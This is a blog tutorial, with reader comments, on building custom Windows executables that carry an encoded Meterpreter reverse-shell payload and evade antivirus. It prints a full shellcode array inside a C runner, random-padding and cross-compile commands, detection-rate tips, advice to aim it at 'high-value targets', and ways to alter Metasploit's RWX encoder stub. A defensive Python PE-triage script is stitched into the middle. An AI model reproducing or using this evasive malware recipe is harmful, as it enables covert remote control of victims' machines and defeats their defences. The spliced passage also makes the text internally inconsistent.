Creating Custom Meterpreter EXE Templates to Bypass Windows AV

Posted: December 12, 2011 in Guides

In a previous article I discussed using SET and shellcodeexec to create basic backdoored executable files with the meterpreter reverse shell to bypass Anti-Virus on Windows. I have received several comments and emails regarding this method not working for individuals despite it being undetectable by AV. I will now show you another method of creating a custom EXE stub to bypass AV.

It’s important to note that once you run this through VirusTotal it’s going to get detected, so you need to randomize your EXE stub template as much as possible. Also, use this on high-value targets only, as each payload will have maybe a 24-48 hour lifespan on a production network before AV picks it up.

Please note: this is not my creation; this concept has been discussed and demonstrated about a million times by people far more intelligent than myself. So if you feel like I’m stealing your idea, I’m sorry; it was a good idea 😛

Creating The Executable Skeleton

We’ll create a basic framework for our executable here. It will be a simple C skeleton and will look like this:


#include <stdio.h>
//make sure you modify this skeleton (padding, payload, etc.) every time you generate a new stub.
//this will be randomly generated to obfuscate our code
unsigned char padding[]=
""  /* random padding string goes here */
;
//meterpreter payload goes here
unsigned char payload[]=
""  /* shellcode bytes go here */
;
//cast the payload buffer to a function pointer and jump into it
int main(void) { ((void (*)())payload)();}

We will call this meterpreter.c for giggles.

Generating our Payload

First thing we'll do is generate our payload and encode it. Remember that encoding does little against AV; it gives us some benefit, but it does more for us in terms of bypassing IDS.

After this, place the payload in the meterpreter.c file; it should look like so:


#include <stdio.h>
//make sure you modify this skeleton (padding, payload, etc.) every time you generate a new stub.
//this will be randomly generated to obfuscate our code
unsigned char padding[]=
""  /* random padding string goes here */
;
//meterpreter payload goes here
unsigned char payload[]=
"\xb9\x8a\x02\x00\x00\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c"
"\x0e\x07\xe2\xfa\xb8\x7a\x01\x04\x05\xee\xf8\xf7\xf6\xf5"
"\xca\x52\x3d\x42\x01\x17\xf3\xe8\xab\x70\x14\x12\x12\xf6"
"\xe1\xed\xed\xe9\xd7\x4c\x22\x62\x20\x35\xd0\xcc\x8e\x64"
"\x33\x3a\x3b\xdc\xca\xc1\xc0\xc7\xf8\x7c\x13\x50\x13\x01"
"\xe5\xfa\xb9\x4a\x0a\x00\x00\xe0\xf7\xff\xff\x87\xb9\x3e"
"\x50\x14\x56\x47\xa2\xb2\xf0\x72\x41\x4c\x4d\xae\xb8\xaf"
"\xae\xd5\xea\x6a\x05\x42\x01\x1f\xfb\xe8\xab\x00\x1c\x12"
"\x12\xce\xd9\xcd\xcd\xb1\x8f\x0c\x62\x2a\x68\x75\x90\x84"
"\xc6\x7c\x73\x62\x63\xbc\xaa\xb9\xb8\xc7\xf8\x74\x1b\x50"
"\x13\x09\xed\xfa\xb9\x0a\xf1\xe0\xe0\x38\x2f\x3f\x3f\x4f"
"\x71\xfe\x90\xdc\x9e\x87\x62\x6a\x28\x8a\x62\x74\x75\xae"
"\xb8\xa7\xa6\xd5\xea\x62\x0d\x42\x01\x27\xc3\xc8\xce\x7d"
"\xb4\x4e\x72\x4c\x05\xfe\xac\xd0\xb7\x8c\x3f\xbf\x7d\x17"
"\x52\xf3\x71\xb1\x9a\x81\x91\xad\xad\xc8\x61\x12\x59\xc4"
"\x66\xb8\x12\x7a\xa9\x6f\x35\xc3\xa0\x4f\xa0\x2b\xe2\x64"
"\x4c\x3b\x96\x95\x8d\x6c\xab\x45\x19\x5b\x25\x86\x87\x88"
"\x44\x5e\xa2\x88\xf3\xde\x6d\x22\x71\x41\x91\xac\xae\xf7"
"\xde\x82\xaa\xc0\x79\xaa\xa3\x71\xb6\x1b\xbb\x2e\xd1\xea"
"\x4e\x74\x26\xe5\xd9\xf7\x42\x4d\x82\x82\xe3\x81\xe2\xfc"
"\xe3\x1a\xa3\xd8\x0a\x62\xa1\x1f\x74\x94\x05\x3e\xa3\x5b"
"\x90\xd5\xcf\xc6\x71\xd3\xf0\x9f\x60\x63\x87\x77\x65\x5c"
"\x68\x51\x48\xef\xee\x3d\xb4\xb0\x2c\x95\x29\x60\xad\xff"
"\x22\xb9\x61\x7d\x8d\x5d\xaf\x7b\x54\x03\x16\xce\xc5\x6a"
"\x28\x9b\xfe\xa2\xb2\xfd\x31\x88\x7e\xd3\x68\xf0\xd4\x97"
"\x8d\x45\xf9\x20\x62\x14\xbf\x90\x17\xa1\x4d\x85\x5f\x0e"
"\x49\x04\x51\xc6\x10\x9e\x4f\x22\xd9\x0f\xc3\xc0\xa3\xd3"
"\xa4\x5a\x51\xe3\x97\xe6\x1e\xcb\x4a\x5d\x26\xdc\xcf\xc3"
"\x28\x09\x8c\xb5\x26\x0f\xb7\x62\x18\xe6\x24\x56\x1a\xfd"
"\x91\x77\x22\x90\xe6\xaa\x4b\x0e\x55\x8c\xc9\x17\x2f\x25"
"\x49\x31\x0a\x2d\x0b\x82\x6e\x99\x8f\xe4\xd2\x20\x28\xce"
"\xd8\x68\x35\x85\xb4\x95\xfb\xf7\x8d\x57\xea\x09\x0b\xbb"
"\xa6\x3b\x03\xb5\xf4\x49\x8b\xf4\x5e\x9e\x2e\x11\x83\xaa"
"\x22\x89\xc4\xdb\xfc\xa6\x65\xd4\x35\x88\x35\x84\x6d\xb1"
"\xe2\x7e\x88\xd2\xc6\xc5\xef\x67\x50\x35\x81\x11\x29\xff"
"\x27\x85\xc6\x7e\xc7\xc7\x2c\x5c\x14\xeb\x7b\xda\xac\x54"
"\x04\xdc\x4e\xf5\xfd\x6b\x7d\xcb\x10\x81\xde\x38\xdb\x54"
"\x4a\xf0\x0b\x5e\xbf\x9c\x8c\x6b\x91\xfb\xa8\x42\x22\x96"
"\xaa\xf5\x33\xce\xa6\x68\x04\xbe\x01\xba\xd2\x94\x24\xa5"
"\x7f\x2b\x2c\x4f\x1c\xcd\x33\x88\x83\x07\xd8\x9c\x7e\xe8"
"\x1a\x40\x79\x86\xc5\x19\x93\x0f\x4f\x86\x31\x2c\xcd\xf4"
"\x7c\xad\x28\xcb\x1c\xb5\x46\x33\x8c\xca\xe0\x85\x07\x1b"
"\x57\x11\xe2\x2b\x48\x2f\x13\x2b\xa7\x72\xb4\x02\x26\x69"
"\xbf\x92\x83\x1d\x76\xe8\x11\xcb\xc2\x76\x48\x1f\x22\xfb"
"\xbd\x8b\xc5\x0a\x77\x0a\xd9\x23\xcd\x8a\x38\x5e\x9d\x06"
"\x95\x57\x52\x29\xa5\x69\x30\x0e\x42\x88\x07\x85\x3e\xe1"
"\xf2\xf7\xed\xcc\xa2\xea\x31\x6e\x09\xdf\x6f\x0c\x5b\xc4"
"\x30\xb0\xd6\xdd\xc9\x91\x94\x4d\xbe\xf1\xf4"

;
//cast the payload buffer to a function pointer and jump into it
int main(void) { ((void (*)())payload)();}

Insert Random Padding

Now that we've got our payload inserted, let's place our random padding in. You can do this through any method; I like to do the following:

cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c512 > /root/random

Change the character set given to tr to whatever you need, and change the count on head to however many characters you want to use as padding.


#include <stdio.h>
//make sure you modify this skeleton (padding, payload, etc.) every time you generate a new stub.
//this will be randomly generated to obfuscate our code
unsigned char padding[]=
"cb1BB4YuXguEasx-EPPgGW9XCbgNzUub8pMFMo8IJJrgdHvKE_ywAaXhIT9ZCQ7nkwEsfyP0qRIADUORefB1y9uV0WfxJH0FWkP9y2QD3hZfYDBzcLP-sbHrdzeb9nOlhht5mj5uYsLfv2-wsXIyJ6uXWc-mQyVxyU2TULTF10I4-c545F1EVU1D_paZXshUOYAi6kpDSLIkrfj_xZW-oeqWlcoEQuBE2ZkMnTm7zHoPrpy0qt9Ikgq-p3eGS1sWz4O7D17ujwjB-i9MVk2R6J13vaa0KQ0AN_PxPT6mMbChi82FjgbNuVfHUtfH6n1Om7oHdrDCaBxxZnSYl4VutSY16K0gfpioZtLC98uj3JqQCbA7BUd7L2bEWlmJV-O1erv6bUx_YtxB6RJNdN5eTdsd3Ansd0xx_sCGZMXOtFG4VhWeOODQ8zWY5vgmobrBeaCO_HAUyvpzy81VDaYX5sHoYo8dagKhGPp4GjfaLpPRliynosv0vAHsdp3icE2X"
;
//meterpreter payload goes here
unsigned char payload[]=
"\xb9\x8a\x02\x00\x00\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c"
"\x0e\x07\xe2\xfa\xb8\x7a\x01\x04\x05\xee\xf8\xf7\xf6\xf5"
"\xca\x52\x3d\x42\x01\x17\xf3\xe8\xab\x70\x14\x12\x12\xf6"
"\xe1\xed\xed\xe9\xd7\x4c\x22\x62\x20\x35\xd0\xcc\x8e\x64"
"\x33\x3a\x3b\xdc\xca\xc1\xc0\xc7\xf8\x7c\x13\x50\x13\x01"
"\xe5\xfa\xb9\x4a\x0a\x00\x00\xe0\xf7\xff\xff\x87\xb9\x3e"
"\x50\x14\x56\x47\xa2\xb2\xf0\x72\x41\x4c\x4d\xae\xb8\xaf"
"\xae\xd5\xea\x6a\x05\x42\x01\x1f\xfb\xe8\xab\x00\x1c\x12"
"\x12\xce\xd9\xcd\xcd\xb1\x8f\x0c\x62\x2a\x68\x75\x90\x84"
"\xc6\x7c\x73\x62\x63\xbc\xaa\xb9\xb8\xc7\xf8\x74\x1b\x50"
"\x13\x09\xed\xfa\xb9\x0a\xf1\xe0\xe0\x38\x2f\x3f\x3f\x4f"
"\x71\xfe\x90\xdc\x9e\x87\x62\x6a\x28\x8a\x62\x74\x75\xae"
"\xb8\xa7\xa6\xd5\xea\x62\x0d\x42\x01\x27\xc3\xc8\xce\x7d"
"\xb4\x4e\x72\x4c\x05\xfe\xac\xd0\xb7\x8c\x3f\xbf\x7d\x17"
"\x52\xf3\x71\xb1\x9a\x81\x91\xad\xad\xc8\x61\x12\x59\xc4"
"\x66\xb8\x12\x7a\xa9\x6f\x35\xc3\xa0\x4f\xa0\x2b\xe2\x64"
"\x4c\x3b\x96\x95\x8d\x6c\xab\x45\x19\x5b\x25\x86\x87\x88"
"\x44\x5e\xa2\x88\xf3\xde\x6d\x22\x71\x41\x91\xac\xae\xf7"
"\xde\x82\xaa\xc0\x79\xaa\xa3\x71\xb6\x1b\xbb\x2e\xd1\xea"
"\x4e\x74\x26\xe5\xd9\xf7\x42\x4d\x82\x82\xe3\x81\xe2\xfc"
"\xe3\x1a\xa3\xd8\x0a\x62\xa1\x1f\x74\x94\x05\x3e\xa3\x5b"
"\x90\xd5\xcf\xc6\x71\xd3\xf0\x9f\x60\x63\x87\x77\x65\x5c"
"\x68\x51\x48\xef\xee\x3d\xb4\xb0\x2c\x95\x29\x60\xad\xff"
"\x22\xb9\x61\x7d\x8d\x5d\xaf\x7b\x54\x03\x16\xce\xc5\x6a"
"\x28\x9b\xfe\xa2\xb2\xfd\x31\x88\x7e\xd3\x68\xf0\xd4\x97"
"\x8d\x45\xf9\x20\x62\x14\xbf\x90\x17\xa1\x4d\x85\x5f\x0e"
"\x49\x04\x51\xc6\x10\x9e\x4f\x22\xd9\x0f\xc3\xc0\xa3\xd3"
"\xa4\x5a\x51\xe3\x97\xe6\x1e\xcb\x4a\x5d\x26\xdc\xcf\xc3"
"\x28\x09\x8c\xb5\x26\x0f\xb7\x62\x18\xe6\x24\x56\x1a\xfd"
"\x91\x77\x22\x90\xe6\xaa\x4b\x0e\x55\x8c\xc9\x17\x2f\x25"
"\x49\x31\x0a\x2d\x0b\x82\x6e\x99\x8f\xe4\xd2\x20\x28\xce"
"\xd8\x68\x35\x85\xb4\x95\xfb\xf7\x8d\x57\xea\x09\x0b\xbb"
"\xa6\x3b\x03\xb5\xf4\x49\x8b\xf4\x5e\x9e\x2e\x11\x83\xaa"
"\x22\x89\xc4\xdb\xfc\xa6\x65\xd4\x35\x88\x35\x84\x6d\xb1"
"\xe2\x7e\x88\xd2\xc6\xc5\xef\x67\x50\x35\x81\x11\x29\xff"
"\x27\x85\xc6\x7e\xc7\xc7\x2c\x5c\x14\xeb\x7b\xda\xac\x54"
"\x04\xdc\x4e\xf5\xfd\x6b\x7d\xcb\x10\x81\xde\x38\xdb\x54"
"\x4a\xf0\x0b\x5e\xbf\x9c\x8c\x6b\x91\xfb\xa8\x42\x22\x96"
"\xaa\xf5\x33\xce\xa6\x68\x04\xbe\x01\xba\xd2\x94\x24\xa5"
"\x7f\x2b\x2c\x4f\x1c\xcd\x33\x88\x83\x07\xd8\x9c\x7e\xe8"
"\x1a\x40\x79\x86\xc5\x19\x93\x0f\x4f\x86\x31\x2c\xcd\xf4"
"\x7c\xad\x28\xcb\x1c\xb5\x46\x33\x8c\xca\xe0\x85\x07\x1b"
"\x57\x11\xe2\x2b\x48\x2f\x13\x2b\xa7\x72\xb4\x02\x26\x69"
"\xbf\x92\x83\x1d\x76\xe8\x11\xcb\xc2\x76\x48\x1f\x22\xfb"
"\xbd\x8b\xc5\x0a\x77\x0a\xd9\x23\xcd\x8a\x38\x5e\x9d\x06"
"\x95\x57\x52\x29\xa5\x69\x30\x0e\x42\x88\x07\x85\x3e\xe1"
"\xf2\xf7\xed\xcc\xa2\xea\x31\x6e\x09\xdf\x6f\x0c\x5b\xc4"
"\x30\xb0\xd6\xdd\xc9\x91\x94\x4d\xbe\xf1\xf4"

;
//cast the payload buffer to a function pointer and jump into it
int main(void) { ((void (*)())payload)();}

Compile it

Now we simply cross-compile it for Windows:

/usr/bin/i686-mingw32msvc-gcc -Wall meterpreter.c -o meterpreter.exe

You'll probably get some warnings.
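An added triage check, not from the original post: the stub above runs shellcode straight out of the writable data array, which only works when DEP is not enforced for the process, and the exe.rb snippet further down mentions a RWX segment. Two cheap things to look at when triaging a suspect EXE are therefore whether the PE opts into DEP (the NX_COMPAT bit in DllCharacteristics) and whether any section is marked both writable and executable. The sample PE below is constructed inline as a header-only image for testing, not a real binary, and the "MinGW-like" flag layout is an assumption for illustration.

```python
import struct
import sys

# Constants from the PE/COFF specification
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def pe_triage(data):
    """Parse PE headers from bytes; report DEP opt-in and any writable+executable sections."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe_off + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]    # same offset in PE32 and PE32+
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i                          # 40-byte section headers follow
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        flags = struct.unpack_from("<I", data, hdr + 36)[0]    # section Characteristics
        sections.append((name, flags))
    wx = [n for n, f in sections if f & IMAGE_SCN_MEM_EXECUTE and f & IMAGE_SCN_MEM_WRITE]
    return {"nx_compat": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
            "wx_sections": wx, "sections": sections}

def build_sample_pe(dll_chars, sections):
    """Constructed header-only PE32 image for testing (hypothetical, not a runnable program)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)         # e_lfanew -> 0x40
    opt = bytearray(224)                                       # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)                      # Magic = PE32
    struct.pack_into("<H", opt, 70, dll_chars)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    hdrs = b"".join(name.ljust(8, b"\0") + b"\0" * 28 + struct.pack("<I", flags)
                    for name, flags in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + hdrs

if __name__ == "__main__":
    # Real file if a path is given; otherwise a constructed sample assumed to look like an
    # old MinGW build: no NX_COMPAT bit, read/execute .text and read/write .data.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = build_sample_pe(0, [(b".text", 0x60000020), (b".data", 0xC0000040)])
    print(pe_triage(data))
```

A binary with no NX_COMPAT bit is not malicious by itself, but combined with a tiny import table and a large initialised data blob it is exactly the shape this post produces.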

Now verify your shell

And check it on VirusTotal. Report here.

You should come up with less than a 20% detection rate, with none of the major AV vendors picking it up. If you're coming up higher than that, you can add more to your executable stub and/or try using an actual EXE as the template (don't use notepad.exe; everyone does notepad). Also, swapping the payload for custom shellcode will give you a 0% detection rate most of the time.

If you're still getting picked up by AV you can try some hacks in

/opt/framework/msf3/lib/msf/core/exploit/exe.rb

I would suggest checking out this bit of code.

                # Copy the code to a new RWX segment to allow for self-modifying encoders
                payload = win32_rwx_exec(code)

Most AV will trigger on the RWX allocation the encoder stub performs. Modifying this and creating a custom encoder should allow you to bypass all current AV signatures. Note that this is a theory; I haven't had to test it.

So... Yeah, I'm not writing about Windows for a while. Hope you guys enjoyed it 😉

Comments
  1. Dan says:

    “So… Yeah I’m not writing about Windows for a while anymore”

    The dark side is calling to you Adam, you must return to the Microsoft Empire! LOL! 🙂

  2. Rmmoul says:

    This worked great, except for two things. I had to remove the #include directive to get the code to compile since I wasn’t including any files, and the other thing was minor: when you create the payload, the output file has plus signs at the end of each line that need to be removed.

    Also, in backtrack I had to compile using wine, something like:

    wine ~/.wine/drive_c/MinGW/bin/gcc.exe /path/to/the/code.c -o /path/to/save/the/code.exe

    Thanks for the write up!

    • dangertux says:

      Hey, yeah, the #include got slaughtered; for some reason my WordPress theme escapes the characters and everything in between them. I guess it thinks it’s HTML (regardless of code tags).

      It should be #include <stdio.h>

      I should probably also have mentioned the +’s at the end of the code, but that is an easy command:

      cat outputfile | sed -e 's/+$//' > newoutputfile

      Also, you don’t need to compile it in WINE if you don’t want to; you do, however, need the MinGW compiler to compile a Windows binary under Linux. Hope this helps.
